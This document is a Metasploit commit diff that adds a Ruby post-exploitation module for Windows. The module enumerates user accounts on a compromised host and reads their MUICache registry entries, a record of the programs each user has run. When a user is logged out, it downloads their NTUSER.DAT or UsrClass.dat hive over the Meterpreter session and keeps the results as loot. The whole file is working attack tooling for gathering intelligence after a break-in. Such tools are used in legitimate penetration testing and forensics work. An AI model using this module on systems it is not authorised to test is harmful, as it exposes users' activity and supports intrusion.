Land rapid7#2858, @jiuweigui's post module to enumerate Enumerate MUICache

jvazquez-r7 · jvazquez-r7 · commit 0d07fb6c3929 · 2014-05-29T17:08:50.000-05:00
diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb
@@ -0,0 +1,262 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'rex/registry'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        =>'Windows Gather Enum User MUICache',
+      'Description' =>
+      %q{
+        This module gathers information about the files and file paths that logged on users have
+        executed on the system. It also will check if the file exists on the system still. This
+        information is gathered by using information stored under the MUICache registry key. If
+        the user is logged in when the module is executed it will collect the MUICache entries
+        by accessing the registry directly. If the user is not logged in the module will download
+        users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are
+        parsed from the downloaded hive.
+      },
+      'License'     =>  MSF_LICENSE,
+      'Author'      =>  ['TJ Glad <tjglad[at]cmail.nu>'],
+      'Platform'    =>  ['win'],
+      'SessionType' =>  ['meterpreter']
+    ))
+  end
+
+  # Scrapes usernames, sids and homepaths from the registry so that we'll know
+  # what user accounts are on the system and where we can find those users
+  # registry hives.
+  def find_user_names
+    user_names = []
+    user_homedir_paths = []
+    user_sids = []
+
+    username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
+    profile_subkeys = registry_enumkeys(username_reg_path)
+    if profile_subkeys.blank?
+      print_error("Unable to access ProfileList registry key. Can't continue.")
+      return nil
+    end
+
+    profile_subkeys.each do |user_sid|
+      unless user_sid.length > 10
+        next
+      end
+      user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
+      if user_home_path.blank?
+        print_error("Unable to read ProfileImagePath from the registry. Can't continue.")
+        return nil
+      end
+      full_path = user_home_path.strip
+      user_names << full_path.split("\\").last
+      user_homedir_paths << full_path
+      user_sids << user_sid
+    end
+
+    return user_names, user_homedir_paths, user_sids
+  end
+
+  # This function builds full registry muicache paths so that we can
+  # later enumerate the muicahe registry key contents.
+  def enum_muicache_paths(sys_sids, mui_path)
+    user_mui_paths = []
+    hive = "HKU\\"
+
+    sys_sids.each do |sid|
+      full_path = hive + sid + mui_path
+      user_mui_paths << full_path
+    end
+
+    user_mui_paths
+  end
+
+  # This is the main enumeration function that calls other main
+  # functions depending if we can access the registry directly or if
+  # we need to download the hive and process it locally.
+  def enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
+    results = []
+
+    all_user_entries = sys_users.zip(muicache_reg_keys, sys_paths)
+
+    all_user_entries.each do |user, reg_key, sys_path|
+
+      subkeys = registry_enumvals(reg_key)
+      if subkeys.blank?
+        # If the registry_enumvals returns us nothing then we'll know
+        # that the user is most likely not logged in and we'll need to
+        # download and process users hive locally.
+        print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..")
+        result = process_hive(sys_path, user, muicache, hive_file)
+        unless result.nil?
+          result.each { |r|
+            results << r unless r.nil?
+          }
+        end
+      else
+        # If the registry_enumvals returns us content we'll know that we
+        # can access the registry directly and thus continue to process
+        # the content collected from there.
+        print_status("User #{user}: Enumerating registry..")
+        subkeys.each do |key|
+          if key[0] != "@" && key != "LangID" && !key.nil?
+            result = check_file_exists(key, user)
+            results << result unless result.nil?
+          end
+        end
+      end
+    end
+
+    results
+  end
+
+  # This function will check if it can find the program executable
+  # from the path it found from the registry. Permissions might affect
+  # if it detects the executable but it should be otherwise fairly
+  # reliable.
+  def check_file_exists(key, user)
+    program_path = expand_path(key)
+    if file_exist?(key)
+      return [user, program_path, "File found"]
+    else
+      return [user, program_path, "File not found"]
+    end
+  end
+
+  # This function will check if the filepath contains a registry hive
+  # and if it does it'll proceed to call the function responsible of
+  # downloading the hive. After successfull download it'll continue to
+  # call the hive_parser function which will extract the contents of
+  # the MUICache registry key.
+  def process_hive(sys_path, user, muicache, hive_file)
+    user_home_path = expand_path(sys_path)
+    hive_path = user_home_path + hive_file
+    ntuser_status = file_exist?(hive_path)
+
+    unless ntuser_status == true
+      print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.")
+      return nil
+    end
+
+    print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..")
+    local_hive_copy = Rex::Quickfile.new("jtrtmp")
+    local_hive_copy.close
+    begin
+      session.fs.file.download_file(local_hive_copy.path, hive_path)
+    rescue ::Rex::Post::Meterpreter::RequestError
+      print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file")
+      local_hive_copy.unlink rescue nil
+      return nil
+    end
+    results = hive_parser(local_hive_copy.path, muicache, user)
+    local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles
+
+    results
+  end
+
+  # This function is responsible for parsing the downloaded hive and
+  # extracting the contents of the MUICache registry key.
+  def hive_parser(local_hive_copy, muicache, user)
+    results = []
+    print_status("Parsing registry content..")
+    err_msg = "Error parsing hive. Can't continue."
+    hive = Rex::Registry::Hive.new(local_hive_copy)
+    if hive.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key = hive.relative_query(muicache)
+    if muicache_key.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_value_list = muicache_key.value_list
+    if muicache_key_value_list.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_values = muicache_key_value_list.values
+    if muicache_key_values.nil?
+      print_error(err_msg)
+      return nil
+    end
+
+    muicache_key_values.each do |value|
+      key = value.name
+      if key[0] != "@" && key != "LangID" && !key.nil?
+        result = check_file_exists(key, user)
+        results << result unless result.nil?
+      end
+    end
+
+    results
+  end
+
+  # Information about the MUICache registry key was collected from:
+  #
+  # - Windows Forensic Analysis Toolkit / 2012 / Harlan Carvey
+  # - Windows Registry Forensics / 2011 / Harlan Carvey
+  # - http://forensicartifacts.com/2010/08/registry-muicache/
+  # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
+  def run
+    print_status("Starting to enumerate MuiCache registry keys..")
+    sys_info = sysinfo['OS']
+
+    if sys_info =~/Windows XP/ && is_admin?
+      print_good("Remote system supported: #{sys_info}")
+      muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache"
+      hive_file = "\\NTUSER.DAT"
+    elsif sys_info =~/Windows 7/ && is_admin?
+      print_good("Remote system supported: #{sys_info}")
+      muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache"
+      hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
+    else
+      print_error("Unsupported OS or not enough privileges. Unable to continue.")
+      return nil
+    end
+
+    table = Rex::Ui::Text::Table.new(
+      'Header'  =>  'MUICache Information',
+      'Indent'  =>  1,
+      'Columns' =>
+      [
+        "Username",
+        "File path",
+        "File status",
+      ])
+
+    print_status("Phase 1: Searching user names..")
+    sys_users, sys_paths, sys_sids = find_user_names
+
+    if sys_users.blank?
+      print_error("Was not able to find any user accounts. Unable to continue.")
+      return nil
+    else
+      print_good("Users found: #{sys_users.join(", ")}")
+    end
+
+    print_status("Phase 2: Searching registry hives..")
+    muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
+    results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
+
+    results.each { |r| table << r }
+
+    print_status("Phase 3: Processing results..")
+    loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
+    print_line("\n" + table.to_s + "\n")
+    print_status("Results stored in: #{loot}")
+    print_status("Execution finished.")
+  end
+
+end
